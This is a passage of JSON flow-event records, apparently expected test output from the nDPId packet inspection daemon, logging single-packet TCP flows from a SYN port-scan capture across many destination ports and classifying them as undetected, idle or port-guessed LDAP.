-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10628,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1844,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 